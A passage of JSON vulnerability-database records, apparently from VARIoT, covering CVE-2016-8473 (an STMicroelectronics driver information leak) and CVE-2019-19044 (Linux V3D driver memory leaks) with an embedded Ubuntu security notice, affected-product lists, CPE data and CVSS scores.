        "id": "CNVD-2017-00237",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "id": "VAR-201701-0144",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:05:08.449000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "GoogleNexus\u0027STMicroelectronics\u0027Driver Information Disclosure Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87736"
      },
      {
        "title": "Google Nexus 5X  and Nexus 6P Android STMicroelectronics Fixes for driver information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66799"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95233"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8473"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8473"
      },
      {
        "trust": 0.3,
        "url": "http://www.android.com/"
      },
      {
        "trust": 0.3,
        "url": "https://developers.google.com/android/nexus/images"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95233"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "date": "2017-01-12T20:59:01.857000",
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95233"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "date": "2017-01-18T02:59:16.533000",
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "STMicroelectronics Vulnerability in information disclosure in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1397
Vulnerability from variot

Two memory leaks in the v3d_submit_cl_ioctl() function in drivers/gpu/drm/v3d/v3d_gem.c in the Linux kernel before 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering kcalloc() or v3d_job_init() failures, aka CID-29cd13cfd762. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-29cd13cfd762 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. ========================================================================= Ubuntu Security Notice USN-4225-1 January 07, 2020

linux, linux-aws, linux-azure, linux-azure-5.3, linux-gcp, linux-gcp-5.3, linux-kvm, linux-oracle, linux-raspi2 vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 19.10
  • Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14895, CVE-2019-14901)

It was discovered that a heap-based buffer overflow existed in the Marvell Libertas WLAN Driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14896, CVE-2019-14897)

It was discovered that the Fujitsu ES network device driver for the Linux kernel did not properly check for errors in some situations, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2019-16231)

Anthony Steinhauser discovered that the Linux kernel did not properly perform Spectre_RSB mitigations to all processors for PowerPC architecture systems in some situations. A local attacker could use this to expose sensitive information. (CVE-2019-18660)

It was discovered that the Broadcom V3D DRI driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19044)

It was discovered that the Mellanox Technologies Innova driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19045)

It was discovered that the Mellanox Technologies ConnectX driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19047)

It was discovered that the Intel WiMAX 2400 driver in the Linux kernel did not properly deallocate memory in certain situations. (CVE-2019-19051)

It was discovered that Geschwister Schneider USB CAN interface driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19052)

It was discovered that the netlink-based 802.11 configuration interface in the Linux kernel did not deallocate memory in certain error conditions. (CVE-2019-19055)

It was discovered that the event tracing subsystem of the Linux kernel did not properly deallocate memory in certain error conditions. A physically proximate attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2019-19524)

It was discovered that the Microchip CAN BUS Analyzer driver in the Linux kernel contained a use-after-free vulnerability on device disconnect. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19529)

It was discovered that the PEAK-System Technik USB driver in the Linux kernel did not properly sanitize memory before sending it to the device. A physically proximate attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19807)

It was discovered that the DesignWare USB3 controller driver in the Linux kernel did not properly deallocate memory in some error conditions. (CVE-2019-18813)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.10: linux-image-5.3.0-1008-oracle 5.3.0-1008.9 linux-image-5.3.0-1009-aws 5.3.0-1009.10 linux-image-5.3.0-1009-azure 5.3.0-1009.10 linux-image-5.3.0-1009-kvm 5.3.0-1009.10 linux-image-5.3.0-1011-gcp 5.3.0-1011.12 linux-image-5.3.0-1015-raspi2 5.3.0-1015.17 linux-image-5.3.0-26-generic 5.3.0-26.28 linux-image-5.3.0-26-generic-lpae 5.3.0-26.28 linux-image-5.3.0-26-lowlatency 5.3.0-26.28 linux-image-5.3.0-26-snapdragon 5.3.0-26.28 linux-image-aws 5.3.0.1009.11 linux-image-azure 5.3.0.1009.27 linux-image-gcp 5.3.0.1011.12 linux-image-generic 5.3.0.26.30 linux-image-generic-lpae 5.3.0.26.30 linux-image-gke 5.3.0.1011.12 linux-image-kvm 5.3.0.1009.11 linux-image-lowlatency 5.3.0.26.30 linux-image-oracle 5.3.0.1008.9 linux-image-raspi2 5.3.0.1015.12 linux-image-snapdragon 5.3.0.26.30 linux-image-virtual 5.3.0.26.30

Ubuntu 18.04 LTS: linux-image-5.3.0-1009-azure 5.3.0-1009.10~18.04.1 linux-image-5.3.0-1010-gcp 5.3.0-1010.11~18.04.1 linux-image-azure-edge 5.3.0.1009.9 linux-image-gcp-edge 5.3.0.1010.10

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4225-1 CVE-2019-14895, CVE-2019-14896, CVE-2019-14897, CVE-2019-14901, CVE-2019-16231, CVE-2019-18660, CVE-2019-18813, CVE-2019-19044, CVE-2019-19045, CVE-2019-19047, CVE-2019-19051, CVE-2019-19052, CVE-2019-19055, CVE-2019-19072, CVE-2019-19524, CVE-2019-19529, CVE-2019-19534, CVE-2019-19807

Package Information: https://launchpad.net/ubuntu/+source/linux/5.3.0-26.28 https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1009.10 https://launchpad.net/ubuntu/+source/linux-azure/5.3.0-1009.10 https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1011.12 https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1009.10 https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1008.9 https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1015.17 https://launchpad.net/ubuntu/+source/linux-azure-5.3/5.3.0-1009.10~18.04.1 https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1010.11~18.04.1

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1397",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "5.3.11"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.5"
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h610s"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.1"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.25"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.0"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.3r2"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.2"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.20"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30.5r3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.2"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.3.11",
                "versionStartIncluding": "5.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30.5r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.3r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-19044",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19044",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
